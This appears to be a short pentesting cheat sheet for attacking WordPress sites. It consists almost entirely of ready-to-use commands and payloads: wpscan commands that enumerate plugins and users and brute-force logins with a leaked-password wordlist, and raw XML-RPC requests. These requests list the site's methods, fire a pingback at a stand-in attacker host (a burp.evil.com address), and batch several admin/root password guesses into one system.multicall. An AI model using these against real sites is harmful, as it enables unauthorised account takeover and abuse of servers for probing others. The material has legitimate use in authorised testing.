Skip to content

Wordpress

Wordpress

Check for outdated plugins:

wpscan --url https://test.example.com/ --enumerate p

Enumerate Users:

wpscan --url https://test.example.com/ --enumerate u

Bruteforce Login:

wpscan --url https://test.example.com/ --password-attack xmlrpc-multicall --usernames root,admin --passwords /opt/Hacking/Enumeration/SecurityLists/Passwords/darkweb2017-top1000.txt

XMLRPC

List Methoids:

POST /xmlrpc.php/ HTTP/1.1
Host: test.example.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-SG,en-US;q=0.9,en;q=0.8
Connection: close
Content-Length: 135

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>

Pingback:

POST /xmlrpc.php/ HTTP/1.1
Host: test.example.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-SG,en-US;q=0.9,en;q=0.8
Connection: close
Content-Length: 389

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>pingback.ping</methodName> 
<params>
<param>
<value><string>http://93aw1xaucrnalf94ml7snfytnktahz.burp.evil.com/testpush</string>
</value>
</param>
<param>
<value><string>https://test.example.com/atotech-to-present-at-the-smta-international-2020-electronics/</string>
</value>
</param></params> 
</methodCall>

Multi Login:

POST /xmlrpc.php/ HTTP/1.1
Host: test.example.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-SG,en-US;q=0.9,en;q=0.8
Connection: close
Content-Length: 1443

<?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>

<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>root</string></value><value><string>root</string></value></data></array></value></data></array></value></member></struct></value>

<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>root</string></value><value><string>test</string></value></data></array></value></data></array></value></member></struct></value>

<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>admin</string></value><value><string>admin</string></value></data></array></value></data></array></value></member></struct></value>

<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>admin</string></value><value><string>root</string></value></data></array></value></data></array></value></member></struct></value>

</data></array></value></param></params></methodCall>